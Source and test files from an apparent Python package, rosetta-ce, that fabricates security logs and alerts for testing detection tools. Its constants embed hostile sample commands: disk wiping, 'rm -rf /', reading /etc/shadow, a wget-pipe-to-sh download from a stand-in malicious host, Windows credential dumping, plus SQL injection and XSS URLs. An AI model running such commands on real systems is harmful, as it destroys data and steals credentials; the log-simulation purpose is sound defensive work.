import unittest
from rosetta.rfaker import Events, Observables, ObservableType, ObservableKnown

src_ip, dst_ip, src_host, dst_host = ["192.168.10.10"], ["1.1.1.1"], ["abc"], ["xyz"]
url, port = ["https://example.org"], ["555"]
protocol, app = ["ftp"], ["chrome.exe"]
user = ["ayman"]
file_name, file_hash = ["test.zip"], ["719283fd5600eb631c23b290530e4dac9029bae72f15299711edbc800e8e02b2"]
cmd, process = ["sudo restart"], ["bind"]
severity = ["high", "critical"]
sensor = ["fw"]
action = ["block"]
incident_types = ["Phishing"]

observables_list = Observables(src_ip=src_ip, dst_ip=dst_ip, src_host=src_host, dst_host=dst_host, url=url, port=port,
                               protocol=protocol, app=app, user=user, file_name=file_name, file_hash=file_hash, cmd=cmd,
                               process=process, severity=severity, sensor=sensor, action=action,
                               incident_types=incident_types)


class TestObservables(unittest.TestCase):
    def test_generator(self):
        generated_bad_ip = Observables.generator(count=2, observable_type=ObservableType.IP,
                                                 known=ObservableKnown.BAD)
        self.assertTrue(isinstance(generated_bad_ip, list))
        self.assertEqual(len(generated_bad_ip), 2)
        generated_good_ip = Observables.generator(count=1, observable_type=ObservableType.IP,
                                                  known=ObservableKnown.GOOD)
        self.assertTrue(isinstance(generated_good_ip, list))
        self.assertEqual(len(generated_good_ip), 1)
        generated_bad_url = Observables.generator(count=3, observable_type=ObservableType.URL,
                                                  known=ObservableKnown.BAD)
        self.assertTrue(isinstance(generated_bad_url, list))
        self.assertEqual(len(generated_bad_url), 3)
        generated_good_url = Observables.generator(count=4, observable_type=ObservableType.URL,
                                                   known=ObservableKnown.GOOD)
        self.assertTrue(isinstance(generated_good_url, list))
        self.assertEqual(len(generated_good_url), 4)
        generated_bad_hash = Observables.generator(count=2, observable_type=ObservableType.SHA256,
                                                   known=ObservableKnown.BAD)
        self.assertTrue(isinstance(generated_bad_hash, list))
        self.assertEqual(len(generated_bad_hash), 2)
        generated_good_hash = Observables.generator(count=1, observable_type=ObservableType.SHA256,
                                                    known=ObservableKnown.GOOD)
        self.assertTrue(isinstance(generated_good_hash, list))
        self.assertEqual(len(generated_good_hash), 1)
        generated_term = Observables.generator(count=1, observable_type=ObservableType.TERMS)
        self.assertTrue(isinstance(generated_term, list))
        self.assertEqual(len(generated_term), 1)
        generated_cve = Observables.generator(count=1, observable_type=ObservableType.CVE)
        self.assertTrue(isinstance(generated_cve, list))
        self.assertEqual(len(generated_cve), 1)
        for message in generated_cve:
            self.assertIn('CVE', message)


class TestRFaker(unittest.TestCase):

    def test_syslog(self):
        fake_messages = Events.syslog(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(observables_list.src_host[0], message)

    def test_cef(self):
        fake_messages = Events.cef(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(f'from {observables_list.src_host[0]}', message)

    def test_leef(self):
        fake_messages = Events.leef(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(f'|{observables_list.src_host[0]}|', message)

    def test_winevent(self):
        fake_messages = Events.winevent(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(f"{observables_list.src_host[0]}", message)

    def test_json(self):
        fake_messages = Events.json(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(f"{observables_list.src_host[0]}", message['host'])

    def test_incidents(self):
        fake_messages = Events.incidents(count=2, observables=observables_list)
        self.assertTrue(isinstance(fake_messages, list))
        self.assertEqual(len(fake_messages), 2)
        for message in fake_messages:
            self.assertIn(f"{observables_list.incident_types[0]}", message['type'])


if __name__ == '__main__':
    unittest.main()



import unittest
from rosetta.rconverter import Converter, ConverterToEnum, ConverterFromEnum


class TestConverter(unittest.TestCase):

    def test_converter(self):
        cef_log = "CEF:0|Security|Intrusion Detection System|1.0|Alert|10|src=192.168.0.1 dst=192.168.0.2 act=blocked"
        expected_json = {
            'message': 'converted',
            'data': {
                'version': 'CEF:0',
                'device_vendor': 'Security',
                'device_product': 'Intrusion Detection System',
                'device_version': '1.0',
                'device_event_class_id': 'Alert',
                'name': '10',
                'extensions': {
                    'src': '192.168.0.1',
                    'dst': '192.168.0.2',
                    'act': 'blocked'
                }
            }
        }

        result = Converter.convert(from_type=ConverterFromEnum.CEF, to_type=ConverterToEnum.JSON, data=cef_log)
        self.assertEqual(result, expected_json)


if __name__ == '__main__':
    unittest.main()



from datetime import datetime
import time
import threading
import socket
import requests
import warnings
from typing import Optional
from urllib3.exceptions import InsecureRequestWarning

from rosetta.rfaker import Observables, Events


class Sender:
    """
    A class for sending fake data to a destination via a TCP or UDP socket or HTTP request.

    Args:
        worker_name (str): Name of the worker.
        data_type (str): Type of the data to send.
        count (int): Number of messages to send.
        interval (int): Time interval (in seconds) between each message sent.
        destination (str): Destination address in the format <protocol>://<ip_address>:<port>.
        observables (Observables): Host name or IP address to use for fake data.
        fields (str): Comma-separated list of incident fields to include in the fake data.

    Attributes:
        thread (threading.Thread): Thread object for the worker.
        worker_name (str): Name of the worker.
        data_type (WorkerTypeEnum): Type of the data to send.
        count (int): Number of messages to send.
        interval (int): Time interval (in seconds) between each message sent.
        destination (str): Destination address in the format <protocol>://<ip_address>:<port>.
        created_at (datetime): Timestamp of when the worker was created.
        status (str): Status of the worker (Running, Stopped, Connection Error).
        observables (list): Host name or IP address to use for fake data.
        fields (str): Comma-separated list of incident fields to include in the fake data.

    Methods:
        start() -> str:
            Starts the worker thread.

            Returns:
                str: Current status of the worker (Running, Stopped).

        stop() -> str:
            Stops the worker thread.

            Returns:
                str: Current status of the worker (Running, Stopped).

        send_data() -> None:
            Sends fake data to the destination address.

            Returns:
                None.
    """

    def __init__(self, data_type: str, destination: str, headers: Optional[dict] = None,
                 worker_name: Optional[str] = 'worker_'+str(datetime.now()), count: Optional[int] = 1,
                 interval: Optional[int] = 1, vendor: Optional[str] = None, product: Optional[str] = None,
                 version: Optional[str] = None, required_fields: Optional[str] = None,
                 observables: Optional[Observables] = None, fields: Optional[str] = None,
                 verify_ssl: Optional[bool] = None, datetime_obj: Optional[datetime] = None,
                 data_json: Optional[dict] = None, data_text: Optional[str] = None):
        """
        Constructor for DataSenderWorker class.

        :param data_type: A value from the WorkerTypeEnum indicating the type of data to send. Options include:
            - SYSLOG
            - CEF
            - LEEF
            - WINEVENT
            - JSON
            - INCIDENT
        :param destination: str, destination address and port in the format <scheme>://<address>:<port>.
        :param worker_name: str, name of the worker.
        :param count: int, number of times to send the data.
        :param interval: int, time interval between two consecutive data sends.
        :param vendor: Optional. The vendor.
        :param product: Optional. The product.
        :param version: Optional. The version.
        :param required_fields: Optional. A list of fields that are required to present in the generated data, whether
         from observables or randomely.
        :param observables: Optional. Observables, list of observables.
        :param fields: Optional. comma-separated list of fields to include in incident data.
        :param verify_ssl: Optional. handling ssl verification errors.
        :param datetime_obj: Optional. time to start from.
        :param data_json: Optional. JSON data to send.
        :param data_text: Optional. Text data to send.

        :return: None
        """
        if headers is None:
            self.headers = {}
        else:
            self.headers = headers
        self.thread = None
        self.worker_name = worker_name
        self.data_type = data_type
        self.count = count
        self.interval = interval
        self.vendor = vendor
        self.product = product
        self.version = version
        self.required_fields = required_fields
        self.destination = destination
        self.created_at = datetime.now()
        self.status = "Stopped"
        self.response = None
        self.observables = observables
        self.fields = fields
        self.verify_ssl = verify_ssl
        self.datetime_obj = datetime_obj
        self.data_json = data_json
        self.data_text = data_text

    def start(self) -> str:
        """
        Starts the worker thread.

        Returns:
            str: Current status of the worker (Running, Stopped).
        """
        if self.status == "Stopped":
            self.thread = threading.Thread(target=self.send_data, args=())
            self.status = "Running"
            print(f"Starting worker: {self.worker_name}")
            self.thread.start()
        return self.status

    def stop(self) -> str:
        """
        Stops the worker thread.

        Returns:
            str: Current status of the worker (Running, Stopped).
        """
        if self.status == "Running":
            self.thread.join()
            self.status = "Stopped"
        return self.status

    def send_data(self) -> None:
        """
        Sends fake data to the destination address.

        Returns:
            None.
        """
        fake_message = None
        while self.status == "Running" and self.count > 0:
            try:
                self.count -= 1
                if self.data_type in ["SYSLOG", "CEF", "LEEF"]:
                    if self.data_text:
                        fake_message = [self.data_text]
                    else:
                        if self.data_type == "SYSLOG":
                            fake_message = Events.syslog(count=1, datetime_iso=self.datetime_obj,
                                                         observables=self.observables, required_fields=self.required_fields)
                        if self.data_type == "CEF":
                            fake_message = Events.cef(count=1, datetime_iso=self.datetime_obj, vendor=self.vendor,
                                                      product=self.product, version=self.version,
                                                      required_fields=self.required_fields, observables=self.observables)
                        if self.data_type == "LEEF":
                            fake_message = Events.leef(count=1, datetime_iso=self.datetime_obj, vendor=self.vendor,
                                                       product=self.product, version=self.version,
                                                       required_fields=self.required_fields,
                                                       observables=self.observables)
                    ip_address = self.destination.split(':')[1]
                    port = self.destination.split(':')[2]
                    if 'tcp' in self.destination:
                        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        sock.settimeout(5)
                        sock.connect((ip_address, int(port)))
                        print(f"Worker: {self.worker_name} sending log message to {ip_address} ")
                        sock.sendall(fake_message[0].encode())
                        sock.close()
                    else:
                        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                        sock.settimeout(5)
                        print(f"Worker: {self.worker_name} sending log message to {ip_address} ")
                        sock.sendto(fake_message[0].encode(), (ip_address, int(port)))
                elif self.data_type in ["JSON", "INCIDENT"]:
                    if self.data_json:
                        fake_message = [self.data_json]
                    else:
                        if self.data_type == "JSON":
                            fake_message = Events.json(count=1, datetime_iso=self.datetime_obj,
                                                       observables=self.observables, vendor=self.vendor,
                                                       product=self.product, version=self.version,
                                                       required_fields=self.required_fields,)
                        if self.data_type == "INCIDENT":
                            fake_message = [{
                                "alert": Events.incidents(count=1, observables=self.observables, vendor=self.vendor,
                                                          version=self.version, product=self.product,
                                                          datetime_iso=self.datetime_obj,
                                                          required_fields=self.required_fields, fields=self.fields)
                            }]
                    if '://' not in self.destination:
                        url = 'http://' + self.destination
                    else:
                        url = self.destination
                    warnings.filterwarnings("ignore", category=InsecureRequestWarning)
                    print(f"Worker: {self.worker_name} sending log message to {url} ")
                    response = requests.post(url, json=fake_message[0], timeout=(2, 5), headers=self.headers,
                                             verify=self.verify_ssl)
                    self.response = response.text
                    response.raise_for_status()
            except (ConnectionRefusedError, socket.timeout, requests.exceptions.RequestException) as e:
                print(f"Connection error: {e}")
                self.status = "Connection Error"
                break
            except requests.exceptions.SSLError as e:
                print(f"SSL error: {e}")
                self.status = "SSL Error"
                break
            except Exception as e:
                print(f"Unexpected error: {e}")
                self.status = "Stopped"
                break
            time.sleep(self.interval)
        if self.status == "Running":
            self.status = "Stopped"



INCIDENTS_TYPES = [
    'Malware', 'Phishing', 'Access Violation', 'Lateral Movement', 'Port Scan', 'Sql Injection', 'Brute Force',
    'Control Avoidance', 'Rogue Device', 'Denial Of Service', 'Account Compromised'
]
SEVERITIES = ['Low', 'Medium', 'High', 'Critical']



BAD_IP_SOURCES = [
    {
        "type": "ip",
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/bad-ip.txt",
        "structure": "lines"
    },
    {
        "type": "ip",
        "url": "http://cinsscore.com/list/ci-badguys.txt",
        "structure": "lines"
    }
]
GOOD_IP_SOURCES = [
    {
        "type": "ip",
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/good-ip.txt",
        "structure": "lines"
    },
    {
        "type": "subnet",
        "url": "https://ip-ranges.amazonaws.com/ip-ranges.json",
        "structure": "json",
        "value_key": "prefixes.ip_prefix"
    }
]
BAD_URL_SOURCES = [
    {
        "type": "url",
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/bad-url.txt",
        "structure": "lines"
    },
    {
        "url": "https://urlhaus.abuse.ch/downloads/csv_online",
        "structure": "csv",
        "delimiter": ",",
        "value_column": 2
    }
]
GOOD_URL_SOURCES = [

]
BAD_SHA256_SOURCES = [
    {
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/bad-sha256.txt",
        "structure": "lines"
    }
]
GOOD_SHA256_SOURCES = [

]
CVE_SOURCES = [
    {
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/cve.txt",
        "structure": "csv",
        "delimiter": ",",
        "value_column": 0,
        "description": 1
    }
]
TERMS_SOURCES = [
    {
        "url": "https://raw.githubusercontent.com/ayman-m/rosetta-observables/main/techniques.csv",
        "structure": "csv",
        "value_column": 0,
        "delimiter": ","
    }
]



UNIX_CMD = [
    "cat /etc/shadow",
    "dd if=/dev/zero of=/dev/sda",
    "rm -rf /",
    "find / -name '*.log' -exec rm -f {} \\;",
    "wget -O- http://malicious.example.com/malware | sh",
    "iptables -F",
    "chmod -R 777 /",
    "chown -R nobody:nogroup /"
]
WINDOWS_CMD = [
    "net localgroup", "net user", "Get-LocalUser", "Get-LocalGroup",
    "rundll32.exe vaultcli.dll,VaultEnumerateVaults 0,%TEMP%\\vaultList.txt",
    "Import-Module DSInternals; Get-CachedDomainCredential",
    "Import-Module DSInternals; Get-SamDomainInformation",
    "Import-Module PowerSploit; Invoke-NinjaCopy -Path 'C:\\Windows\\NTDS\\ntds.dit' "
    "-Destination 'C:\\temp\\ntds.dit'",
    "Import-Module PowerShellVault; Get-VaultCredential",
    "reg.exe save HKLM\\Security %TEMP%\\security.hive",
    "Import-Module DSInternals; Get-WinSystemKey",
    "wmic.exe /namespace:\\root\\cimv2 path Win32_Account",
    "Import-Module PowerSploit; Get-GPPPassword"
]
WIN_PROCESSES = ["explorer.exe", "svchost.exe", "services.exe", "lsass.exe", "smss.exe", "csrss.exe", "wininit.exe",
                 "winlogon.exe", "taskhostw.exe", "conhost.exe", "dwm.exe", "wuauclt.exe", "SearchIndexer.exe",
                 "spoolsv.exe", "taskmgr.exe", "regedit.exe", "mmc.exe", "rundll32.exe", "dllhost.exe"]
WIN_EVENTS = [
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><Provider Name="Microsoft-Windows-Sysmon" Guid="{guid}"/>'
    '<EventID>10</EventID><Version>5</Version><Level>4</Level><Task>10</Task><Opcode>0</Opcode>'
    '<Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime="{system_time}"/>'
    '<EventRecordID>{event_record_id}</EventRecordID><Correlation/>'
    '<Execution ProcessID="{process_id}" '
    'ThreadID="{thread_id}" Channel="Microsoft-Windows-Sysmon/Operational"/>'
    '<EventData><Data Name="TargetImage">C:\\Windows\\System32\\calc.exe</Data>'
    '<Data Name="TargetPID">{target_pid}</Data></EventData></Event>',
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'
    '<EventID>4672</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode>'
    '<Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="{system_time}"/>'
    '<EventRecordID>{event_record_id}</EventRecordID><Correlation/>'
    '<Execution ProcessID="{process_id}" '
    'ThreadID="{thread_id}" Channel="Security"/><Computer>{host}</Computer>'
    '<Security UserID="{user_id}"/>'
    '<EventData><Data Name="SubjectUserSid">{user_id}</Data>'
    '<Data Name="SubjectUserName">{user_name}</Data>'
    '<Data Name="SubjectDomainName">{domain_name}</Data>'
    '<Data Name="SubjectLogonId">{subject_login_id}</Data>'
    '<Data Name="PrivilegeList">{privilege_list}</Data></EventData></Event>',
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'
    '<EventID>4648</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode>'
    '<Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="{system_time}"/>'
    '<EventRecordID>{event_record_id}</EventRecordID><Correlation/><Execution ProcessID="'
    '{process_id}" '
    'ThreadID="{thread_id}" Channel="Security"/><Computer>{host}</Computer>'
    '<Security UserID="{user_id}"/>'
    '<EventData><Data Name="SubjectUserSid">{user_id}</Data><Data Name="SubjectUserName">'
    '{user_name}</Data>'
    '<Data Name="SubjectDomainName">{domain_name}</Data><Data Name="SubjectLogonId">'
    '{user_id}</Data>'
    '<Data Name="NewProcessId">{new_process_id}</Data><Data Name="ProcessId">{process_id}</Data>'
    '<Data Name="CommandLine">{cmd}</Data><Data Name="TargetUserSid">{user_id}</Data>'
    '<Data Name="TargetUserName">{user_name}</Data><Data Name="TargetDomainName">'
    '{domain_name}</Data>'
    '<Data Name="TargetLogonId">{user_id}</Data><Data Name="LogonType">3</Data></EventData></Event>',
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'
    '<EventID>4624</EventID><Version>0</Version><Level>0</Level><Task>12544</Task><Opcode>0</Opcode>'
    '<Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="{system_time}"/>'
    '<EventRecordID>{event_record_id}</EventRecordID><Correlation/>'
    '<Execution ProcessID="{process_id}" '
    'ThreadID="{thread_id}" Channel="Security"/><Computer>{host}</Computer>'
    '<Security UserID="{user_id}"/><EventData><Data Name="SubjectUserSid">{user_id}</Data>'
    '<Data Name="SubjectUserName">{user_name}</Data>'
    '<Data Name="SubjectDomainName">{domain_name}</Data><Data Name="SubjectLogonId">{user_id}</Data>'
    '<Data Name="LogonType">3</Data><Data Name="TargetUserSid">{user_id}</Data>'
    '<Data Name="TargetUserName">{user_name}</Data>'
    '<Data Name="TargetDomainName">{domain_name}</Data>'
    '<Data Name="ProcessName">{process_name}</Data><Data Name="ProcessId">{process_id}</Data>'
    '<Data Name="DestinationLogonId">{destination_login_id}</Data>'
    '<Data Name="SourceNetworkAddress">{source_network_address}</Data>'
    '<Data Name="SourcePort">{source_port}</Data><Data Name="LogonGuid">{guid}</Data>'
    '<Data Name="TransmittedServices">{transmitted_services}</Data></EventData></Event>',
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'
    '<EventID>4688</EventID><Version>0</Version><Level>0</Level><Task>13312</Task><Opcode>0</Opcode>'
    '<Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="{system_time}"/>'
    '<EventRecordID>{event_record_id}</EventRecordID><Correlation/>'
    '<Execution ProcessID="{process_id}" '
    'ThreadID="{thread_id}" Channel="Security"/><Computer>{host}</Computer>'
    '<Security UserID="{user_id}"/>'
    '<EventData><Data Name="SubjectUserSid">{user_id}</Data>'
    '<Data Name="SubjectUserName">{user_name}</Data>'
    '<Data Name="SubjectDomainName">{domain_name}</Data><Data Name="SubjectLogonId">{user_id}</Data>'
    '<Data Name="NewProcessId">{new_process_id}</Data>'
    '<Data Name="CreatorProcessId">{process_id}</Data>'
    '<Data Name="TokenElevationType">TokenElevationTypeLimited (3)</Data>'
    '<Data Name="ProcessCommandLine">{cmd}</Data>'
]



import unittest
from unittest.mock import patch
from rosetta.rsender import Sender, WorkerTypeEnum
from rosetta.rfaker import Observables

src_ip, dst_ip, src_host, dst_host = ["192.168.10.10"], ["1.1.1.1"], ["abc"], ["xyz"]
url, port = ["https://example.org"], ["555"]
protocol, app = ["ftp"], ["chrome.exe"]
user = ["ayman"]
file_name, file_hash = ["test.zip"], ["719283fd5600eb631c23b290530e4dac9029bae72f15299711edbc800e8e02b2"]
cmd, process = ["sudo restart"], ["bind"]
severity = ["high", "critical"]
sensor = ["fw"]
action = ["block"]
incident_types = ["Phishing"]

observables_list = Observables(src_ip=src_ip, dst_ip=dst_ip, src_host=src_host, dst_host=dst_host, url=url, port=port,
                               protocol=protocol, app=app, user=user, file_name=file_name, file_hash=file_hash, cmd=cmd,
                               process=process, severity=severity, sensor=sensor, action=action,
                               incident_types=incident_types)


class TestRSender(unittest.TestCase):

    def setUp(self):
        self.worker = Sender(
            data_type=WorkerTypeEnum.SYSLOG,
            destination='tcp://127.0.0.1:514',
            count=1,
            interval=1,
            observables=observables_list
        )

    def tearDown(self):
        self.worker.stop()

    def test_start(self):
        self.worker.start()
        self.assertEqual(self.worker.status, 'Running')

    def test_stop(self):
        self.worker.start()
        self.worker.stop()
        self.assertEqual(self.worker.status, 'Stopped')

    @patch('rosetta.rsender.RSender.send_data')
    def test_send_data(self, mock_send_data):
        self.worker.start()
        mock_send_data.assert_called()


if __name__ == '__main__':
    unittest.main()



ACTIONS = ["Allow", "Deny", "Drop", "Wait", "Log"]
PROTOCOLS = ["TCP", "UDP", "HTTP", "SSL", "SQL", "SSH", "FTP", "RTP", "RDP"]
TECHNIQUES = [
    {
        "technique": "Injection",
        "indicator": "https://example.com/login.php?username=admin' OR 1=1 --&password=pass",
        "mechanism": "Web-POST"
    },
    {
        "technique": "Broken Authentication and Session Management",
        "indicator": "https://example.com/admin.php?sessionid=12345",
        "mechanism": "Web-POST"
    },
    {
        "technique": "Cross-Site Scripting (XSS)",
        "indicator": "https://example.com/search.php?q=<script>alert('xss')</script>",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Broken Access Control",
        "indicator": "https://example.com/user/profile.php?id=1234' OR 1=1 --&password=pass",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Security Misconfiguration",
        "indicator": "https://example.com/index.php",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Insecure Cryptographic Storage",
        "indicator": "https://example.com/checkout.php?ccnum=1234567890",
        "mechanism": "Web-POST"
    },
    {
        "technique": "Insufficient Transport Layer Protection",
        "indicator": "http://example.com/login.php",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Unvalidated Redirects and Forwards",
        "indicator": "https://example.com/redirect.php?to=http://malicious.com",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Using Components with Known Vulnerabilities",
        "indicator": "https://example.com/assets/jquery-1.11.1.js",
        "mechanism": "Web-GET"
    },
    {
        "technique": "Insufficient Logging and Monitoring",
        "indicator": "https://example.com/login.php?username=admin&password=pass",
        "mechanism": "Web-POST"
    }
]
ERROR_CODE = [200, 403, 404, 500]



import setuptools

with open("README.md", "r") as fh:
    long_description = fh.read()

setuptools.setup(
    name="rosetta-ce",
    version="1.5.9",
    author="Ayman Mahmoud",
    author_email="content@ayman.online",
    description="Rosetta is a Python package that can be used to fake security logs and alerts for testing different "
                "detection and response use cases.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/ayman-m/rosetta",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
    install_requires=[
        "requests",
        "faker",
        "urllib3"
    ]
)



from enum import Enum


class ConverterFromEnum(Enum):
    CEF = 'cef'


class ConverterToEnum(Enum):
    JSON = 'json'
    LEEF = 'leef'


class Converter:
    @classmethod
    def convert(cls, from_type: ConverterFromEnum, to_type: ConverterToEnum, data: str) -> dict:
        """
        Converts a CEF log message to JSON format.

        Args:
            from_type (ConverterFromEnum): The "from" data type, currently supported options are CEF.
            to_type (to_type): The "to" data type, currently supported options are JSON and LEEF.
            data (str): The data message to be converted.

        Returns:
            str: The converted data message.

        Raises:
            ValueError: If the data message is invalid.

        Example:
            >>> data = "CEF:0|Security|threatmanager|1.0|100|detected an attack|10|src=192.168.1.1 dst=192.168.1.2"
            >>> Converter.convert(from_type=ConverterFromEnum.CEF, to_type=ConverterToEnum.JSON, data=data)
            '{"message": "converted", "data": {"version": "0", "device_vendor": "Security", "device_product":
            "threatmanager", "device_version": "1.0", "device_event_class_id": "100", "name": "detected an attack",
            "extensions": {"src": "192.168.1.1", "dst": "192.168.1.2"}}}'
        """
        converted_data = None
        if from_type == ConverterFromEnum.CEF:

            parts = data.split('|')
            if len(parts) < 6:
                raise ValueError('Invalid CEF log format')

            if to_type == ConverterToEnum.JSON:
                converted_data = {
                    'version': parts[0],
                    'device_vendor': parts[1],
                    'device_product': parts[2],
                    'device_version': parts[3],
                    'device_event_class_id': parts[4],
                    'name': parts[5],
                    'extensions': {}
                }
                if len(parts) > 6:
                    for ext in parts[6].split(' '):
                        key, value = ext.split('=', 1)
                        converted_data['extensions'][key] = value

            elif to_type == ConverterToEnum.LEEF:
                leef_dict = {
                    'LEEF': '1.0',
                    'Vendor': parts[1],
                    'Product': parts[2],
                    'Version': parts[3],
                    'EventID': parts[4],
                    'Name': parts[5]
                }
                if len(parts) > 6:
                    for ext in parts[6].split(' '):
                        key, value = ext.split('=', 1)
                        leef_dict[key] = value
                converted_data = '!'.join([f"{k}={v}" for k, v in leef_dict.items()])
        if converted_data:
            return {
                "message": "converted",
                "data": converted_data
            }
        else:
            return {
                "message": "inputs invalid",
                "data": converted_data
            }



import random
import requests
import warnings
import ipaddress
import json
import csv
import hashlib
from enum import Enum
from functools import reduce
from faker import Faker
from datetime import datetime, timedelta
from typing import Optional, List
from rosetta.constants.sources import BAD_IP_SOURCES, GOOD_IP_SOURCES, BAD_URL_SOURCES, GOOD_URL_SOURCES, \
    BAD_SHA256_SOURCES, GOOD_SHA256_SOURCES, CVE_SOURCES, TERMS_SOURCES
from rosetta.constants.systems import UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES
from rosetta.constants.sensors import ACTIONS, PROTOCOLS, TECHNIQUES, ERROR_CODE


class ObservableType(Enum):
    IP = 'ip'
    URL = 'url'
    SHA256 = 'sha256'
    CVE = 'cve'
    TERMS = 'terms'


class ObservableKnown(Enum):
    BAD = 'bad'
    GOOD = 'good'


class Observables:
    def __init__(self, local_ip: list = None, remote_ip: Optional[list] = None, local_ip_v6: list = None,
                 remote_ip_v6: Optional[list] = None, src_host: Optional[list] = None,
                 dst_host: Optional[list] = None, src_domain: Optional[list] = None, dst_domain: Optional[list] = None,
                 sender_email: Optional[list] = None, recipient_email: Optional[list] = None,
                 email_subject: Optional[list] = None, email_body: Optional[list] = None,
                 url: Optional[list] = None, source_port: Optional[list] = None, remote_port: Optional[list] = None,
                 protocol: Optional[list] = None, inbound_bytes: Optional[list] = None,
                 outbound_bytes: Optional[list] = None, app: Optional[list] = None, os: Optional[list] = None,
                 user: Optional[list] = None, cve: Optional[list] = None, file_name: Optional[list] = None,
                 file_hash: Optional[list] = None, win_cmd: Optional[list] = None, unix_cmd: Optional[list] = None,
                 win_process: Optional[list] = None, win_child_process: Optional[list] = None,
                 unix_process: Optional[list] = None, unix_child_process: Optional[list] = None,
                 technique: Optional[list] = None, entry_type: Optional[list] = None, severity: Optional[list] = None,
                 sensor: Optional[list] = None, action: Optional[list] = None, event_id: Optional[list] = None,
                 error_code: Optional[list] = None, terms: Optional[list] = None, alert_types: Optional[list] = None,
                 alert_name: Optional[list] = None, incident_types: Optional[list] = None,
                 analysts: Optional[list] = None, action_status: Optional[list] = None):
        self.local_ip = local_ip
        self.remote_ip = remote_ip
        self.local_ip_v6 = local_ip_v6
        self.remote_ip_v6 = remote_ip_v6
        self.src_host = src_host
        self.dst_host = dst_host
        self.src_domain = src_domain
        self.dst_domain = dst_domain
        self.sender_email = sender_email
        self.recipient_email = recipient_email
        self.email_subject = email_subject
        self.email_body = email_body
        self.url = url
        self.source_port = source_port
        self.remote_port = remote_port
        self.protocol = protocol
        self.inbound_bytes = inbound_bytes
        self.outbound_bytes = outbound_bytes
        self.app = app
        self.os = os
        self.user = user
        self.cve = cve
        self.file_name = file_name
        self.file_hash = file_hash
        self.win_cmd = win_cmd
        self.unix_cmd = unix_cmd
        self.win_process = win_process
        self.win_child_process = win_child_process
        self.unix_process = unix_process
        self.unix_child_process = unix_child_process
        self.technique = technique
        self.entry_type = entry_type
        self.severity = severity
        self.sensor = sensor
        self.action = action
        self.event_id = event_id
        self.error_code = error_code
        self.terms = terms
        self.incident_types = incident_types
        self.analysts = analysts
        self.alert_types = alert_types
        self.alert_name = alert_name
        self.action_status = action_status

    @staticmethod
    def _get_observables_from_source(source: dict) -> list:
        """
        Fetches observables from a given source and returns them as a list.

        Args:
        - source: A dictionary containing information about the source, including its type, URL, structure, and value
                  column or key.

        Returns:
        - A list of observables fetched from the source.

        Raises:
        - Exception: If the HTTP status code of the response is not 200 OK.
        """
        results = []
        source_type = source.get('type')
        response = requests.get(source['url'])
        if response.status_code != 200:
            raise Exception(f"Failed to get data from {source['url']}, status code {response.status_code}")
        if source['structure'] == 'lines':
            results = [line.strip() for line in response.text.strip().split("\n") if not line.startswith("#")]
        elif source['structure'] == 'csv':
            rows = csv.reader(filter(lambda line: not line.startswith('#'), response.text.strip().split('\n')),
                              delimiter=source['delimiter'])
            for row in rows:
                results.append(row[source['value_column']])
        elif source['structure'] == 'json':
            results = reduce(lambda d, key: d[key] if key != source['value_key'].split('.')[-1] else [i[key]
                                                                                                      for i in d],
                             source['value_key'].split('.'), response.json())
        random.shuffle(results)
        if source_type == 'subnet':
            ip_addresses = []
            for subnet in results:
                for ip in ipaddress.IPv4Network(subnet):
                    ip_addresses.append(str(ip))
                if len(ip_addresses) > 1000:
                    break
            return ip_addresses
        return results

    @staticmethod
    def _create_faker():
        """
        Returns:
            Faker instance.
        """
        return Faker()

    @classmethod
    def generator(cls, count: int, observable_type: ObservableType,
                  known: ObservableKnown = ObservableKnown.BAD) -> List[str]:
        """
        Generates a list of observable values based on the given observable type and known status, with a desired count.
